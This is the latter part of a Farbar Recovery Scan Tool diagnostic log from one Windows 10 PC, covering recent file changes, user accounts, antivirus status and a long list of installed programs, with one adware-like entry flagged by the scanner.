2019-11-24 18:20 - 2017-05-26 14:22 - 000000000 ____D C:\Users\SR\AppData\Local\CrashDumps
2019-11-24 17:01 - 2018-06-02 15:16 - 000000000 ____D C:\Windows\system32\SleepStudy
2019-11-24 14:47 - 2017-11-04 13:39 - 000013336 _____ C:\Windows\system32\BMXStateBkp-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx
2019-11-24 14:47 - 2017-11-04 13:39 - 000013336 _____ C:\Windows\system32\BMXState-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx
2019-11-24 14:47 - 2017-11-04 13:39 - 000011564 _____ C:\Windows\system32\DVCState-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx
2019-11-24 14:47 - 2017-11-04 13:39 - 000001224 _____ C:\Windows\system32\BMXCtrlState-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx
2019-11-24 14:47 - 2017-11-04 13:39 - 000001224 _____ C:\Windows\system32\BMXBkpCtrlState-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx
2019-11-24 10:51 - 2018-04-12 01:38 - 000000000 ____D C:\Windows\AppReadiness
2019-11-23 18:35 - 2018-04-12 01:38 - 000000000 ___HD C:\Program Files\WindowsApps
2019-11-22 21:41 - 2017-05-26 15:08 - 000002096 _____ C:\Windows\Sandboxie.ini
2019-11-21 20:12 - 2019-02-18 21:23 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
2019-11-21 19:49 - 2017-05-26 16:56 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Native Instruments
2019-11-21 17:13 - 2019-07-15 15:01 - 000000000 ____D C:\Users\SR\AppData\Roaming\ViberPC
2019-11-21 01:11 - 2018-04-12 01:38 - 000000000 ____D C:\Windows\LiveKernelReports
2019-11-19 23:10 - 2017-05-26 16:56 - 000000000 ____D C:\Program Files\Native Instruments
2019-11-19 11:34 - 2019-03-02 14:15 - 000634880 _____ C:\Users\SR\Documents\MeNew_v2.fmp12
2019-11-18 17:19 - 2017-09-08 20:54 - 000000000 ____D C:\Users\SR\Documents\REAPER Media
2019-11-18 15:43 - 2019-10-19 15:18 - 000018960 _____ (Logitech, Inc.) C:\Windows\system32\Drivers\LNonPnP.sys
2019-11-18 14:07 - 2019-10-03 18:47 - 000000000 ___HD C:\Users\Public\Documents\AdobeGCData
2019-11-18 14:07 - 2019-10-03 18:47 - 000000000 ___HD C:\ProgramData\Documents\AdobeGCData
2019-11-17 21:04 - 2017-09-08 20:57 - 000027684 _____ C:\Users\SR\Desktop\sc3.tmp
2019-11-17 15:25 - 2017-05-26 12:41 - 000000000 ____D C:\Users\SR\Documents\Camtasia Studio
2019-11-17 13:17 - 2018-01-16 19:24 - 000000000 ____D C:\Users\SR\AppData\Roaming\vlc
2019-11-16 00:54 - 2018-01-03 12:14 - 000000000 ____D C:\Program Files (x86)\Dropbox
2019-11-16 00:19 - 2018-11-26 20:34 - 000006144 _____ C:\Users\SR\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2019-11-14 19:23 - 2017-09-08 22:18 - 000000000 ____D C:\Users\SR\AppData\Roaming\Mp3tag
2019-11-14 13:00 - 2018-06-02 15:24 - 000003374 _____ C:\Windows\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3967059023-4107875624-2872843465-1001
2019-11-14 13:00 - 2018-06-02 15:19 - 000002403 _____ C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2019-11-14 13:00 - 2017-05-25 17:10 - 000000000 ___RD C:\Users\SR\OneDrive
2019-11-14 12:13 - 2018-04-12 15:16 - 000000000 ____D C:\Users\SR\AppData\Local\PlaceholderTileLogoFolder
2019-11-13 15:13 - 2018-02-14 15:35 - 000000000 ____D C:\Users\SR\AppData\Local\Packages
2019-11-13 13:02 - 2017-05-25 19:45 - 000748816 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2019-11-12 12:45 - 2018-06-02 15:16 - 005163280 _____ C:\Windows\system32\FNTCACHE.DAT
2019-11-11 17:40 - 2018-01-03 12:23 - 000000000 ___RD C:\Users\SR\Dropbox
2019-11-11 15:38 - 2017-08-27 19:44 - 000000000 ____D C:\Users\SR\AppData\Roaming\Visual Studio Setup
2019-11-11 14:05 - 2018-06-02 15:19 - 000000000 ____D C:\Users\SR
2019-11-11 13:49 - 2015-07-10 13:04 - 000017535 _____ C:\Windows\system32\Drivers\etc\services
2019-11-11 13:48 - 2017-09-07 13:40 - 000000000 ____D C:\Users\SR\.oracle_jre_usage
2019-11-11 13:48 - 2017-05-26 16:29 - 000000000 ____D C:\Program Files\Java
2019-11-11 13:48 - 2017-05-25 21:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2019-11-10 20:52 - 2017-08-27 19:49 - 000000000 ____D C:\Program Files (x86)\Microsoft SDKs
2019-11-10 20:48 - 2017-06-30 19:12 - 000000000 ____D C:\ProgramData\Package Cache
2019-11-10 20:46 - 2018-04-12 01:30 - 000000000 ____D C:\Windows\CbsTemp
2019-11-10 20:34 - 2017-08-27 19:44 - 000000000 ____D C:\Program Files (x86)\Microsoft Visual Studio
2019-11-10 20:34 - 2017-06-11 17:39 - 000000000 ____D C:\Program Files (x86)\Microsoft SQL Server
2019-11-10 20:33 - 2018-06-02 13:14 - 000000000 ____D C:\Program Files (x86)\MSBuild
2019-11-10 20:33 - 2018-04-12 01:38 - 000000000 ____D C:\Program Files\Common Files\microsoft shared
2019-11-10 20:33 - 2017-08-27 19:49 - 000000000 ____D C:\Program Files (x86)\Windows Kits
2019-11-10 16:31 - 2019-01-08 14:50 - 000000000 ____D C:\Users\SR\AppData\Roaming\temp_info_collect
2019-11-10 16:30 - 2019-01-08 14:50 - 000000000 ____D C:\ProgramData\EMM
2019-11-09 19:38 - 2017-08-27 20:07 - 000000000 ____D C:\Users\SR\Documents\Visual Studio 2017
2019-11-09 19:32 - 2017-08-27 19:44 - 000001402 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio Installer.lnk
2019-11-08 14:06 - 2019-10-09 15:00 - 000000000 ____D C:\Users\SR\Desktop\Unused Mods
2019-11-08 12:53 - 2017-05-27 13:55 - 000000000 ____D C:\Users\SR\Documents\Flight Simulator X Files
2019-11-03 17:55 - 2017-05-25 17:30 - 000000000 ____D C:\Program Files\Mozilla Firefox
2019-11-03 17:55 - 2017-05-25 17:30 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2019-11-03 13:05 - 2017-11-15 14:46 - 000001275 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2019-10-31 10:47 - 2019-04-17 23:11 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IconShepherd
2019-10-31 10:47 - 2019-04-17 23:11 - 000000000 ____D C:\Program Files\IconShepherd
2019-10-29 10:07 - 2018-03-01 10:19 - 000000000 ____D C:\Windows\system32\Drivers\wd
2019-10-28 22:32 - 2018-12-02 22:13 - 000000000 ____D C:\Users\SR\Documents\FIFA 19

==================== Files in the root of some directories ========

2019-08-11 17:16 - 2019-08-11 17:16 - 000137168 _____ (Mozilla Foundation) C:\ProgramData\mozglue.dll
2019-08-11 17:16 - 2019-08-11 17:16 - 001246160 _____ (Mozilla Foundation) C:\ProgramData\nss3.dll
2017-06-18 13:13 - 2019-10-20 14:44 - 000000132 ____H () C:\Users\SR\AppData\Roaming\Adobe PNG Format CC Prefs
2017-05-27 13:13 - 2017-05-27 13:13 - 000001167 ____H () C:\Users\SR\AppData\Roaming\trace_FilterInstaller.1.txt
2017-05-27 13:13 - 2017-05-29 13:58 - 000000905 ____H () C:\Users\SR\AppData\Roaming\trace_FilterInstaller.txt
2017-05-27 13:13 - 2017-05-29 13:58 - 000000000 ____H () C:\Users\SR\AppData\Roaming\trace_FilterInstaller.txt-CRT.txt
2019-06-01 18:59 - 2019-10-20 14:40 - 000001456 _____ () C:\Users\SR\AppData\Local\Adobe Save for Web 13.0 Prefs
2018-11-26 20:34 - 2019-11-16 00:19 - 000006144 _____ () C:\Users\SR\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2018-09-27 17:57 - 2018-09-27 17:57 - 000000000 _____ () C:\Users\SR\AppData\Local\oobelibMkey.log
2017-06-05 14:13 - 2017-07-14 23:32 - 000007598 _____ () C:\Users\SR\AppData\Local\Resmon.ResmonCfg
2018-03-01 13:55 - 2019-07-25 12:32 - 000001207 _____ () C:\Users\SR\AppData\Local\SuperJolt.Common.log
2018-03-01 13:55 - 2019-07-25 12:32 - 000002529 _____ () C:\Users\SR\AppData\Local\SuperJolt.Snapper.log
2017-06-10 15:40 - 2017-06-12 13:14 - 000930816 _____ () C:\Users\SR\AppData\Local\test_db_cara.db

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)


BCD (recoveryenabled=No -> recoveryenabled=Yes) <==== restored successfully
==================== End of FRST.txt ========================

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 24-11-2019
Ran by SR (24-11-2019 19:51:29)
Running from D:\Users\SR\Downloads
Windows 10 Pro Version 1803 17134.345 (X64) (2018-06-02 13:24:39)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3967059023-4107875624-2872843465-500 - Administrator - Disabled) => C:\Users\Administrator
DefaultAccount (S-1-5-21-3967059023-4107875624-2872843465-503 - Limited - Disabled)
Guest (S-1-5-21-3967059023-4107875624-2872843465-501 - Limited - Enabled)
HomeGroupUser$ (S-1-5-21-3967059023-4107875624-2872843465-1006 - Limited - Enabled)
SR (S-1-5-21-3967059023-4107875624-2872843465-1001 - Administrator - Enabled) => C:\Users\SR
WDAGUtilityAccount (S-1-5-21-3967059023-4107875624-2872843465-504 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Accu-Sim 182 Skylane for FSX (HKLM-x32\...\Accu-Sim 182 Skylane for FSX) (Version:  - )
Accu-Sim Bonanza 35 for Flight Simulator X (HKLM-x32\...\{55DBEDCF-367F-449E-B90C-43416D468ED1}) (Version: 18.9.15.1 - A2A Simulations Inc.) Hidden
Accu-Sim Bonanza 35 for Flight Simulator X (HKLM-x32\...\Accu-Sim Bonanza 35 for Flight Simulator X 18.9.15.1) (Version: 19.5.24.0 - A2A Simulations Inc.)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.9.1.335 - Adobe Systems Incorporated)
Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.223 - Adobe)
Adobe Photoshop CC 2015 (HKLM-x32\...\{793C2BF7-A4FE-4608-91C9-9282C5801C21}) (Version: 16.0 - Adobe Systems Incorporated)
Adobe Premiere (HKLM\...\{C1CB876C-A08E-4692-B525-42848BD154D7}) (Version: 1.0.0000 - Adobe Systems Incorporated) Hidden
Adobe Premiere Pro CC 2017 (HKLM-x32\...\PPRO_11_0_1) (Version: 11.0.1 - Adobe Systems Incorporated)
Aerosoft's - Aerosoft Launcher (HKLM-x32\...\{EE11CFFC-898C-4875-8A63-8B732A9AD43B}) (Version: 1.1.0.1 - Aerosoft)
Aerosoft's - Airbus A320-A321 - FSX STEAM Edition (HKLM-x32\...\Airbus A320-A321 - FSX STEAM Edition) (Version: 1.30 - Aerosoft)
Aerosoft's - Diamond DA20-100 Katana 4X (HKLM-x32\...\{974BF461-4D2C-448A-B05B-502AEA41B7FB}) (Version: 1.04 - Aerosoft)
aerosoft's - FlightSim Commander 9 (HKLM-x32\...\{F941AABE-E868-42D9-9F38-884250F7898A}) (Version: E: - aerosoft)
aerosoft's - Professional Flight Planner X (HKLM-x32\...\{1A5D2729-4A3B-4CD5-85C8-4896FD44B78D}) (Version: 1.15 - aerosoft)
AES Crypt (HKLM\...\{562885D3-41A7-4211-822E-B1B1510069E5}) (Version: 3.10 - Packetizer, Inc.)
Altiverb 6 (HKLM-x32\...\Altiverb 6) (Version:  - )
Apple Application Support (32-bit) (HKLM-x32\...\{5A659BE5-849B-484E-A83B-DCB78407F3A4}) (Version: 7.3 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{F8060941-C0AB-4BCE-88AC-F2FDA2E9F286}) (Version: 7.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{5FA8C4BE-8C74-4B9C-9B49-EBF759230189}) (Version: 12.1.0.25 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{A30EA700-5515-48F0-88B0-9E99DC356B88}) (Version: 2.6.0.1 - Apple Inc.)
Application Verifier x64 External Package (HKLM\...\{B27BC1FC-8474-9E32-73C2-6F7CD58AD1E3}) (Version: 10.1.17763.132 - Microsoft) Hidden
Application Verifier x64 External Package (HKLM\...\{F02CC6FE-37FC-3D47-F961-721D85BAF224}) (Version: 10.1.15063.674 - Microsoft) Hidden
Arena 3.5.1 (HKLM-x32\...\Arena 3.5.1_is1) (Version:  - )
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.14 - Michael Tippach)
AudioEase Altiverb VST RTAS v6.10 (HKLM-x32\...\AudioEase Altiverb VST RTAS_is1) (Version:  - )
Autodesk Maya 2016 (HKLM\...\{3905B678-DC8D-4D5E-AA95-EA254D6C1239}) (Version: 16.0.1312.0 - Autodesk) Hidden
Autodesk Maya 2016 (HKLM\...\Autodesk Maya 2016) (Version: 16.0.1312.0 - Autodesk)
AutoHotkey 1.1.26.01 (HKLM\...\AutoHotkey) (Version: 1.1.26.01 - Lexikos)
Banished (HKLM-x32\...\1207660783_is1) (Version: 2.3.0.7 - GOG.com)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
BS.Player FREE (HKLM-x32\...\BSPlayerf) (Version: 2.72.1082 - AB Team, d.o.o.)
Camtasia 9 (HKLM\...\{B8A4CB7E-7F5B-484F-A127-E4431000EDCE}) (Version: 9.0.4.1948 - TechSmith Corporation) Hidden
Camtasia 9 (HKLM-x32\...\{5957dd25-bb4e-4234-9dc0-b3e10a70f636}) (Version: 9.0.4.1948 - TechSmith Corporation)
Camtasia Studio 8 (HKLM-x32\...\{BFA04EE0-8240-4667-8D53-45496A901C33}) (Version: 8.1.2.1327 - TechSmith Corporation)
Cheat Engine 6.7 (HKLM-x32\...\Cheat Engine 6.7_is1) (Version:  - Cheat Engine)
Cheat Engine 6.8.1 (HKLM-x32\...\Cheat Engine 6.8.1_is1) (Version:  - Cheat Engine)
ChessBase 14 (HKLM-x32\...\{EAC25C55-7C92-451B-94EE-D5BC3932A6A3}) (Version: 14.0.0.0 - ChessBase)
Chessmaster Grandmaster Edition (HKLM-x32\...\{27614800-84A9-484E-9CCB-43ED2F1205F5}) (Version: 1.00.0000 - Ubisoft) Hidden
Chessmaster Grandmaster Edition (HKLM-x32\...\InstallShield_{27614800-84A9-484E-9CCB-43ED2F1205F5}) (Version: 1.00.0000 - Ubisoft)
ClickOnce Bootstrapper Package for Microsoft .NET Framework (HKLM-x32\...\{D256A5B9-68DA-4F6C-A447-A93E5639A46D}) (Version: 4.7.03083 - Microsoft Corporation) Hidden
CloudNet (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\CloudNet) (Version: 20170301 - EpicNet Inc.) <==== ATTENTION
Deep Shredder 12 UCI (HKLM-x32\...\{14B6295D-6D03-4635-A17F-76AB10C74EF0}_is1) (Version:  - Stefan Meyer-Kahlen)
Desktop-Reminder 2 (HKLM-x32\...\{288487BA-D8C5-4C81-BD89-C7E49DD48E18}) (Version: 2.128 - Polenter - Software Solutions) Hidden
Desktop-Reminder 2 (HKLM-x32\...\Desktop-Reminder 2) (Version: 2.128 - Polenter - Software Solutions)
DiagnosticsHub_CollectionService (HKLM\...\{440C5592-4EA5-4772-B256-969D66068843}) (Version: 15.9.28016 - Microsoft Corporation) Hidden
DiskProtect190001 version 19.01 (HKLM-x32\...\{6EE85A71-720C-4C73-8920-9BE5B5BF803D}_is1) (Version: 19.01 - )
DisplayDriverAnalyzer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_DisplayDriverAnalyzer) (Version: 397.93 - NVIDIA Corporation) Hidden
Dropbox (HKLM-x32\...\Dropbox) (Version: 85.4.155 - Dropbox, Inc.)
Dropbox Update Helper (HKLM-x32\...\{099218A5-A723-43DC-8DB5-6173656A1E94}) (Version: 1.3.241.1 - Dropbox, Inc.) Hidden
EaseUS MobiMover 4.5 (HKLM-x32\...\EaseUS MobiMover_is1) (Version:  - EaseUS)
E-muPatchMix DSP (HKLM-x32\...\EMU PatchMix DSP) (Version:  - )
Entity Framework 6.2.0 Tools  for Visual Studio 2017 (HKLM-x32\...\{B843915F-00A1-44B1-994C-1AE0A6400AE3}) (Version: 6.2.61807.0 - Microsoft Corporation) Hidden
EPSON L130 Series Printer Uninstall (HKLM\...\EPSON L130 Series) (Version:  - SEIKO EPSON Corporation)
Epson Software Updater (HKLM-x32\...\{7BAC3F7A-B963-468E-982E-B5608A87408D}) (Version: 4.4.4 - SEIKO EPSON CORPORATION)
Equalizer APO (HKLM\...\EqualizerAPO) (Version: 1.2 - )
eReg (HKLM-x32\...\{3EE9BCAE-E9A9-45E5-9B1C-83A4D357E05C}) (Version: 1.20.138.34 - Logitech, Inc.) Hidden
FIFA 19 (HKLM-x32\...\{3391E07D-8484-4124-817E-FCBDA859FD62}) (Version: 1.0.58.64628 - Electronic Arts)
FileMaker Pro 16 (HKLM-x32\...\{13552F4B-487E-49C0-9DCB-A6A3DC74110C}) (Version: 16.0.4.403 - FileMaker, Inc.) Hidden
FileMaker Pro 16 (HKLM-x32\...\{13552F4B-487E-49C0-9DCB-A6A3DC74110C}_FileMaker) (Version: 16.0.4.403 - FileMaker, Inc.)
Finale (HKLM\...\{48133FCD-8D55-4D52-A668-D1A988FC00C4}) (Version: 25.0.0.6858 - MakeMusic)
Flight One Software - GTN Series (HKLM-x32\...\F1T182T) (Version: 1.23 - Flight One Software)
FLT 7.0v2 (HKLM-x32\...\FLT 7.0v2_is1) (Version:  - The Foundry)
FMRTE 17.3.1.17 (HKLM\...\{72A84F14-6742-48AD-9B14-E9C1BE155F7A}_is1) (Version: 17.3.1.17 - FMRTE)
FMRTE 18.3.3.26 (HKLM\...\{DDBB4759-2DD1-4003-91B0-219DEF70DF13}_is1) (Version: 18.3.3.26 - FMRTE)
Folder Size (64-bit) (HKLM\...\{F24FF688-7138-4CCF-A83F-71E9FB01170E}) (Version: 2.6 - Brio)
Football Manager 2017 (HKLM\...\Football Manager 2017_is1) (Version: 1.0 - )
Football Manager 2017 Editor (HKLM\...\Football Manager 2017 Editor_is1) (Version: 1.0 - )
Football Manager 2018 (HKLM-x32\...\Football Manager 2018_is1) (Version:  - )
Garmin Aviation Checklist Editor (HKLM-x32\...\{51B555C4-F02B-44A5-8710-8EFE8FCB0589}) (Version: 2.3.0.0 - Garmin Ltd or its subsidiaries)
Garmin GTN Trainer (HKLM-x32\...\{FE8823C2-815A-493B-B3A4-DC2C20268AE8}) (Version: 6.21.0 - Garmin)
Global Prime - MetaTrader 4 (HKLM-x32\...\Global Prime - MetaTrader 4) (Version: 4.00 - MetaQuotes Software Corp.)
Google Earth Pro (HKLM\...\{70A0F34E-564B-4F93-ADD6-3BAEC6E44075}) (Version: 7.3.2.5776 - Google)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.34.11 - Google LLC) Hidden
Greenshot 1.2.10.6 (HKLM\...\Greenshot_is1) (Version: 1.2.10.6 - Greenshot)
Gtk# for .Net 2.12.26 (HKLM-x32\...\{BC25B808-A11C-4C9F-9C0A-6682E47AAB83}) (Version: 2.12.26 - Xamarin, Inc.)
HD Tune Pro 5.50 (HKLM-x32\...\HD Tune Pro_is1) (Version:  - EFD Software)
icecap_collection_neutral (HKLM-x32\...\{A3B4D258-74E1-49D6-9A86-2DFEFEE48DEC}) (Version: 15.8.27906 - Microsoft Corporation) Hidden
icecap_collection_x64 (HKLM\...\{E524832A-C567-499A-8872-0D79596E4DEE}) (Version: 15.8.27906 - Microsoft Corporation) Hidden
icecap_collectionresources (HKLM-x32\...\{469961DF-482F-4213-ACD4-4AFD443F2A88}) (Version: 15.8.27924 - Microsoft Corporation) Hidden
icecap_collectionresourcesx64 (HKLM-x32\...\{12246E9A-D1A6-4D96-8CEA-CCFD064B16E2}) (Version: 15.8.27924 - Microsoft Corporation) Hidden
Icon Shepherd (HKLM\...\Icon Shepherd_is1) (Version: 19.10.2 - WinAbility Software Corp.)
IDM Crack 6.25 build 25 (HKLM-x32\...\IDM Crack 6.25 build 25) (Version: 5.40 - Crackingpatching.com Team)
InputMapper (HKLM-x32\...\{026D2025-A7FA-4F5C-AF8C-A6F7A9B917FC}) (Version: 1.6.10.19991 - DSDCS)
InputMapper HidGuardian (HKLM-x32\...\{3753F0EF-7F58-4BBA-B4EA-9E1B83C13B97}) (Version: 1.0.6320.17641 - DSDCS)
Intellisense Lang Pack Mobile Extension SDK 10.0.15063.0 (HKLM-x32\...\{87A8879A-3189-4E81-8D1A-0467301C5049}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
IntelliTraceProfilerProxy (HKLM-x32\...\{ACBAA378-519A-441D-9349-C0AAD8DEAD04}) (Version: 15.0.17289.01 - Microsoft Corporation) Hidden
iTools 3 (HKLM-x32\...\ThinkSky) (Version:  - Shenzhen Thinksky Technology Co., Ltd.)
iTunes (HKLM\...\{D9D08A8F-5A03-486A-AD4D-3A438D521F8B}) (Version: 12.9.3.3 - Apple Inc.)
iZotope RX 5 (HKLM-x32\...\iZotope RX 5_is1) (Version: 5.01 - iZotope, Inc.)
Java 8 Update 231 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180231F0}) (Version: 8.0.2310.11 - Oracle Corporation)
Java 8 Update 60 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418060F0}) (Version: 8.0.600.27 - Oracle Corporation)
Java SE Development Kit 8 Update 60 (64-bit) (HKLM\...\{64A3A4F4-B792-11D6-A78A-00B0D0180600}) (Version: 8.0.600.27 - Oracle Corporation)
Kits Configuration Installer (HKLM-x32\...\{971E24EB-1096-64A5-10C0-7FD2D3774669}) (Version: 10.1.15063.674 - Microsoft) Hidden
Landing Rate Monitor (HKLM-x32\...\{B946315D-F716-492B-B914-718BC9A5D6D4}_is1) (Version: 4.0.0 - Bobby Allen)
Lexikon Sonate version 5.0 (HKLM-x32\...\Lexikon Sonate_is1) (Version: 5.0 - )
LLH5X (HKLM-x32\...\LLH5X) (Version:  - )
LLH7X (HKLM-x32\...\LLH7X) (Version:  - )
LLH8X (HKLM-x32\...\LLH8X) (Version:  - )
LLH-Heli (HKLM-x32\...\LLH-Heli) (Version:  - )
Logitech Options (HKLM\...\LogiOptions) (Version: 6.90.131 - Logitech)
Logitech SetPoint 6.69 (HKLM\...\sp6) (Version: 6.69.123 - Logitech)
loopMIDI (HKLM-x32\...\{55c0d955-4cee-452c-b393-d4c020a967d7}) (Version: 1.0.13.24 - Tobias Erichsen)
loopMIDI (HKLM-x32\...\{9E69C6CD-820A-44A9-9A0A-B7A56AD62A1E}) (Version: 1.0.13.24 - Tobias Erichsen) Hidden
loopMIDIBlockLegacy (HKLM-x32\...\{AEAF7978-3204-451D-8593-BC53EBDDA31D}) (Version: 9.9.9.9 - Tobias Erichsen) Hidden
Macro Recorder 5.7.1 (HKLM-x32\...\Macro Recorder_is1) (Version: 5.7.1 - Jitbit Software)
Malwarebytes version 3.8.3.2965 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.8.3.2965 - Malwarebytes)
Mari 2.5v2 (HKLM\...\Mari 2.5v2_is1) (Version:  - The Foundry)
Max 7 (64-bit) (HKLM\...\{AB97A2FF-BA6F-4B15-8032-FF9A331AFF77}) (Version: 7.0.3 - Cycling '74)
MaxScore (HKLM-x32\...\MaxScore 0.8.41) (Version: 0.8.41 - maxscore)
MayaBonusTools (HKLM\...\{367B88BA-C90B-A1D3-81BA-7C5407698472}) (Version: 17.0.1 - Autodesk, Inc.)
Melodyne 3.1 (HKLM-x32\...\{9D623E1A-30E1-4E55-BD80-5C1359DB120B}) (Version: 3.1.0200 - Celemony Software GmbH) Hidden
Melodyne 3.1 (HKLM-x32\...\{A1F143D1-1F0D-44FB-A44B-71D4367D16DE}) (Version: 3.1.0200 - Celemony Software GmbH)
mental ray renderer for Autodesk Maya 2016 (HKLM\...\{59AC9438-6EE3-4B22-860F-525308329228}) (Version: 16.0.1312.0 - mental ray)
MetaStock 11.0 (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\MetaStock 11.0) (Version:  - )
Microsoft .NET Core SDK 2.1.509 (x64) (HKLM-x32\...\{305c8a42-62c1-4b59-b53f-09a9f066fd44}) (Version: 2.1.509 - Microsoft Corporation)
Microsoft Flight Simulator SimConnect Client v10.0.60905.0 (HKLM-x32\...\{D1AC9B0B-2727-4811-91DC-1FC3C4E47A9B}) (Version: 10.0.60905.0 - Microsoft Corporation)
Microsoft Flight Simulator SimConnect Client v10.0.61242.0 (HKLM-x32\...\{85DF6786-66AA-42EE-8616-AE456B07BD99}) (Version: 10.0.61242.0 - Microsoft Corporation)
Microsoft Flight Simulator SimConnect Client v10.0.61259.0 (HKLM-x32\...\{D61CA184-3F6D-4A50-B2CC-7A18447D6A8D}) (Version: 10.0.61259.0 - Microsoft Corporation)
Microsoft Flight Simulator X Steam Edition (HKLM-x32\...\Microsoft Flight Simulator X Steam Edition_is1) (Version:  - )
Microsoft Office Professional Plus 2016 - el-gr (HKLM\...\ProplusRetail - el-gr) (Version: 16.0.12228.20250 - Microsoft Corporation)
Microsoft Office Professional Plus 2016 - en-us (HKLM\...\ProplusRetail - en-us) (Version: 16.0.12228.20250 - Microsoft Corporation)
Microsoft OneDrive (HKU\.DEFAULT\...\OneDriveSetup.exe) (Version: 18.151.0729.0013 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\OneDriveSetup.exe) (Version: 19.202.1013.0006 - Microsoft Corporation)
Microsoft SQL Server 2012 Express LocalDB  (HKLM\...\{E75776B2-EAE5-42F9-A800-0A10763DEDF0}) (Version: 11.0.2318.0 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server vNext CTP1.6 (HKLM\...\{98DD6908-C582-452A-954D-E79E6DF0310A}) (Version: 15.0.600.33 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server vNext CTP1.6 (HKLM-x32\...\{640EECB8-1962-4D23-ACB2-310107EC7ED9}) (Version: 15.0.600.33 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{9634d50a-0c4d-4f52-8a9f-894a2baae370}) (Version: 11.0.60610.1 - Microsoft Corporation)
